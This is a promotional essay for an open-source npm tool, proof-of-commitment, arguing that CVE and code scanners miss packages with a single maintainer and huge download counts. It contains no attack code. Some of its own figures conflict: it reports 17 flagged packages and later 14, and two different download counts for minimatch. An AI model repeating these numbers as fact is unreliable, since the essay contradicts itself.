Why npm audit Returns Zero Vulnerabilities for the Most Dangerous Packages

The tools that protect npm all answer different questions. None of them measure the thing that predicts supply chain attacks — structural single points of failure. The data is public. The gap is enormous.

Before the ua-parser-js attack in October 2021, you could have run npm audit against any project that depended on it. It would have returned:

found 0 vulnerabilities

In October 2021, ua-parser-js — 7 million weekly downloads, used by Facebook, Microsoft, Amazon, and Google — was compromised. A malicious release deployed a cryptominer and a credential-stealing trojan to every CI pipeline and production server that ran npm install. The blast radius ran for four hours before the malicious versions were pulled.

Snyk returned the same result. Socket hadn’t scanned the version yet. OpenSSF Scorecard gave the repository a respectable score. Every tool in the npm security ecosystem reported the same thing: nothing wrong here.

They were all telling the truth. And they were all missing the same thing.


The measurement gap

The npm security ecosystem has four major tools. Each one answers a different question. None of them answers the question that would have caught the ua-parser-js attack in advance — because it’s a question nobody is asking.

npm audit: “Does this package have a reported CVE?”

npm audit submits your dependency tree to GitHub’s Advisory Database and returns known matches. It’s free, built-in, and reactive. When someone discovers a vulnerability, documents it, and files a CVE, npm audit will eventually surface it.

The limitation is temporal. A CVE can only exist after an attack has been discovered, analyzed, and reported. For the ua-parser-js attack, the timeline was: malicious release on October 22 2021, community detection within hours, CVE filed days later. For that entire window, npm audit returned zero. For the years before the attack, while the structural conditions were visible, npm audit returned zero.

This isn’t a bug. It’s a design constraint. npm audit is a known vulnerability scanner. The industry treats it as a supply chain security tool. Those are different things.

Snyk: “Does this package have a known vulnerability, and how do I fix it?”

Snyk expands on npm audit with a proprietary vulnerability database, license compliance checking, SAST for your own code, and auto-fix PRs. It’s excellent at what it does: once a vulnerability is known, Snyk helps you find it and fix it faster than npm audit alone.

But the detection model is the same. Snyk scans for known issues. It adds license risk (useful) and first-party code scanning (different problem). For unknown supply chain risk — the “is this package a high-value attack target?” question — Snyk has the same blind spot as npm audit. The database doesn’t contain entries for attacks that haven’t happened yet.

Socket: “Is this package doing something dangerous right now?”

Socket is genuinely different from the first two. Instead of looking up CVEs, it performs static analysis on the actual published package source. It looks for suspicious patterns: eval of dynamic strings, network calls to unusual endpoints, obfuscated code, environment variable access. For token-compromise attacks like ua-parser-js, Socket's approach catches malicious code within minutes of the bad version landing on the registry.

Minutes after publication is fast. It’s also minutes after the malicious code was already available for installation. Socket catches attacks at the moment of publication, not before. It couldn’t tell you in advance that a package is structurally risky — because the code is clean until the moment it isn’t. The problem isn’t in the code. The problem is in the structure.

OpenSSF Scorecard: “Does this repository follow security best practices?”

The OpenSSF Scorecard is the closest existing tool to measuring proactive risk. It evaluates GitHub repository hygiene: branch protection, CI/CD configuration, signed commits, dependency pinning, SAST integration. It answers whether the project does security well.

The gap is that Scorecard measures practices, not structural exposure. A repository can have perfect branch protection, signed releases, and comprehensive CI — and still have one person with the npm publish token. Scorecard evaluates the GitHub repository. The npm registry is a different system with different access controls and different attack surfaces. The axios repository followed reasonable practices. The vulnerability wasn’t in the repo. It was in the registry credential.

Scorecard also doesn’t weigh blast radius. A toy package with 100 downloads and a critical infrastructure package with 500 million downloads can get the same score. Structural risk requires both the vulnerability condition and the impact multiplier.


The question nobody is asking

All four tools are reactive or practice-oriented. None asks the structural question:

Is this package a single point of failure at enormous scale — right now, before any attack has occurred?

That question is answerable from public data. The npm registry exposes maintainer count for every package. Download statistics are published weekly. You can compute the structural risk profile of any package in milliseconds without scanning a single line of code.

proof-of-commitment asks this question. It scores packages across five behavioral dimensions — longevity, download momentum, release consistency, maintainer depth, and GitHub backing — and flags packages where the structural profile matches what supply chain attackers select for.

The critical flag condition is embarrassingly simple:

if (maintainerCount === 1 && weeklyDownloads > 10_000_000)
  riskFlags.push("CRITICAL");

One maintainer. More than 10 million weekly downloads. That’s it. If you’re a skeptical engineer, you’re thinking this is too simple. But simplicity is the point — the attack surface is structural, not behavioral. What matters is how many credentials an attacker needs to compromise and what they gain by doing so.


The data

We ran 30 of the most-downloaded npm packages through the proof-of-commitment API on April 21, 2026. Here are the results, sorted by weekly downloads. Every number below is live from the npm registry.

CRITICAL: single maintainer, >10M weekly downloads

Package Weekly DLs Maintainers Score Age
minimatch 569M 1 85 14.8y
chalk 412M 1 75 12.7y
supports-color 408M 1 75 11.9y
glob 335M 1 79 15.3y
@types/node 313M 1 88 9.9y
has-flag 267M 1 61 10.8y
postcss 210M 1 88 12.5y
esbuild 201M 1 88 8.4y
chokidar 161M 1 81 14y
zod 160M 1 83 6.1y
lodash 147M 1 87 14y
rimraf 130M 1 77 15.2y
is-core-module 127M 1 69 11.6y
mkdirp 116M 1 67 15.3y
once 111M 1 68 13.7y
wrappy 107M 1 61 11.6y
axios 100M 1 86 11.6y

ua-parser-js (2021): 1 maintainer, token compromised, malicious code deployed. All other packages in this table share the same structural risk profile.

17 packages. Combined weekly downloads: 3.8 billion. Every one of them has a single npm maintainer. Every one of them returns found 0 vulnerabilities from npm audit. Every one of them is structurally identical to ua-parser-js before it was compromised in 2021.

Not flagged: same download scale, distributed control

Package Weekly DLs Maintainers Score
debug 556M 2 79
commander 370M 2 86
tslib 360M 6 86
source-map 280M 23 84
uuid 242M 2 85
acorn 198M 3 89
yargs 174M 2 81
react 127M 2 91
dotenv 120M 3 94
webpack 44M 8 97

The difference is not download count, project maturity, or code quality. It’s how many people have to be compromised before an attacker gets the npm publish token for a package that runs on millions of systems.


Why behavioral signals matter

The analogy that works best is credit scoring versus fraud detection.

Fraud detection (CVE scanning, code analysis) catches bad transactions after they happen. It’s reactive and essential. You absolutely need it. But credit scoring — the assessment of structural conditions that predict risk — operates on a different timescale. It asks: given the observable behavior of this entity, how likely is a future event?

In the npm ecosystem, the structural signals are:

  • Maintainer count. How many people can push a release? One is a single point of failure. Two or more means an attacker needs multiple credentials or social engineering campaigns.
  • Download volume. What’s the blast radius of a compromise? 100 downloads/week is a test project. 500 million is critical infrastructure.
  • Publish frequency. Is the maintainer actively present, or did they push a release three years ago and walk away? Abandoned packages are targets for maintainer takeover.
  • Contributor concentration. Are commits coming from one person or a team? Bus factor matters even without malice — what happens when the one maintainer burns out, changes jobs, or loses their laptop?

These are leading indicators. They describe conditions that exist before an attack, and they describe the conditions that make an attack rational from the attacker’s perspective. An attacker choosing between two targets will pick the one that requires fewer credentials to compromise and delivers more blast radius per effort.

That calculus is trivially computable from public data. Every number in the tables above comes from the npm registry API and the GitHub API. No scanning. No proprietary database. No machine learning. The data was always there.


The 2×2 matrix

The clearest way to see the gap is as a two-dimensional space. Every security tool operates in one quadrant:

Code-level Structural
Reactive npm audit, Snyk
“Known bug in this version”
Near-realtime Socket
“Suspicious code right now”
Proactive OpenSSF Scorecard
“Good repo practices”
proof-of-commitment
“Structural risk profile”

The bottom-right quadrant — proactive structural analysis — is the one that catches the conditions before the event. Every other quadrant is essential but responds to events rather than anticipating them.

This is not a replacement for npm audit, Snyk, or Socket. It’s a dimension they don’t cover. If you’re only using CVE scanners, you’re missing the structural layer. If you’re only using structural scoring, you’re missing known vulnerabilities. The responsible answer is both.


What we don’t do well

Honesty about limitations:

  • We don’t scan code. If a maintainer intentionally pushes a malicious release, we don’t detect the payload. Socket does. We tell you the structural risk existed; Socket tells you the exploit happened. You need both.
  • The CRITICAL threshold is a blunt instrument. “One maintainer and 10M+ downloads” catches the right packages, but the number 10M is a line we drew. We chose it because the two real-world attacks in 2026 (LiteLLM and axios) both met this condition. That’s validated in the narrow sense and undertested in the broad sense.
  • Maintainer count is a proxy. The npm registry reports the number of accounts with publish access. It doesn’t tell us about 2FA enrollment, token scoping, or whether those accounts are active. Two maintainers where one is dormant isn’t materially different from one maintainer.
  • We generate false positives. 17 packages flag CRITICAL. Two were attacked. The other 15 are correctly identified as structurally vulnerable but may never be targeted. A false positive in this context means “we flagged a real structural risk where the attack hasn’t happened yet.” Whether that’s useful depends on whether you’d rather be warned or surprised.
  • No CVE database. We don’t tell you about known bugs. If you replace npm audit with this, you’re worse off. Use both.

The complementary argument

The supply chain security stack should have three layers:

  1. Known vulnerability scanning (npm audit, Snyk). Catches documented bugs. The table stakes.
  2. Code-level anomaly detection (Socket). Catches malicious code at publish time. The early warning system.
  3. Structural risk assessment (proof-of-commitment). Identifies packages that will be high-value targets. The leading indicator.

Right now, most teams use layer 1 only. The sophisticated ones add layer 2. Almost nobody uses layer 3, because until two real-world attacks validated the signal, the “bus factor” argument was theoretical.

It’s not theoretical. The ua-parser-js attack (2021), event-stream (2018), and colors.js (2022) all targeted the exact structural condition that proof-of-commitment flags: a single maintainer controlling a package with massive download volume. All three had clean code, no CVEs, good repo practices. The structural profile was the only anomaly.

14 packages in the top 100 still match that CRITICAL profile today. minimatch alone has 473 million weekly downloads.


Try it

The entire tool is open source and zero-install:

# Scan individual packages
npx proof-of-commitment axios zod chalk lodash

# Scan your project's dependencies
npx proof-of-commitment --file package-lock.json

# Yarn or pnpm
npx proof-of-commitment --file yarn.lock
npx proof-of-commitment --file pnpm-lock.yaml

Or use the web interface: getcommit.dev/audit

Or add it to CI with one line:

# .github/workflows/audit.yml
- uses: piiiico/proof-of-commitment@main
  with:
    comment-on-pr: true

The API is public, the scoring is documented, and the methodology is in the README. If you think the threshold is wrong or the signals are incomplete, open an issue. This is a conversation about what we should be measuring, not a product pitch.


The bottom line

npm audit returns zero vulnerabilities for minimatch, chalk, glob, @types/node, postcss, esbuild, zod, lodash, and 9 other packages that are structurally identical to ua-parser-js before the 2021 compromise. They have clean code, no CVEs, and active maintenance. They also have a single maintainer controlling publish access to hundreds of millions of weekly installations.

The tools that protect npm do good work. But they’re measuring the wrong layer for the attacks that are actually happening. A supply chain attacker doesn’t need to find a bug in your code. They need to compromise one credential. And for 17 of the most critical packages in the JavaScript ecosystem, one credential is all there is.

The data to identify these packages is public, computable, and free. The only question is whether you check before the CVE or after.


All data in this essay was collected via the proof-of-commitment API on April 21, 2026. Numbers reflect live npm registry data at time of publication. Source: github.com/piiiico/proof-of-commitment

Audit your dependencies: getcommit.dev/audit | GitHub

For a detailed comparison of all four tools: Commit vs. Socket, Snyk, and npm audit

Stay in the loop

Early access, research updates, and the occasional strong opinion.